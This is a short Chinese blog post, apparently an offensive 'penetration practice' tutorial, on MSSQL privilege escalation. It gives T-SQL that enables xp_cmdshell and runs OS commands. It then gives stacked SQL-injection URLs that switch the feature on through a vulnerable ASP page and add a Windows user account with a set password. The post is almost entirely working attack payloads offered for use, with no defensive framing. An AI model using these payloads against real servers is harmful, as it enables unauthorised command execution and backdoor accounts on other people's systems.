Mssql 提权

作者: 耗子 分类: 渗透实战 发布时间: 2018-03-31 12:36

执行命令在win05 08 服务器是默认关闭的需要打开,别的版本可以直接进行执行

 

1,如果是连接了数据库可以进行这些操作

 

— 打开高级存储过程开关

EXEC sp_configure ‘show advanced options’, 1

 

–使高级存储过程变更生效

RECONFIGURE WITH OVERRIDE

 

— 启用这个组件

EXEC sp_configure ‘xp_cmdshell’, 1

 

–为高级选项更新当前配置的值

RECONFIGURE WITH OVERRIDE

 

–执行命令

EXEC XP_CMDSHELL ‘whoami’

1

 

2.如果无法连接,可以在注入点输入语句就可以,但是无法回显.

http://localhost/1.asp?id=1;EXEC sp_configure ‘show advanced options’, 1;RECONFIGURE WITH OVERRIDE;

 

http://localhost/1.asp?id=1;EXEC sp_configure ‘xp_cmdshell’, 1;RECONFIGURE WITH OVERRIDE;

 

http://localhost/1.asp?id=1;exec xp_cmdshell ‘net user 1234 Aa123456 /add’;

2

如果觉得我的文章对您有用,请随意打赏。您的支持将鼓励我继续创作!

发表评论

电子邮件地址不会被公开。 必填项已用*标注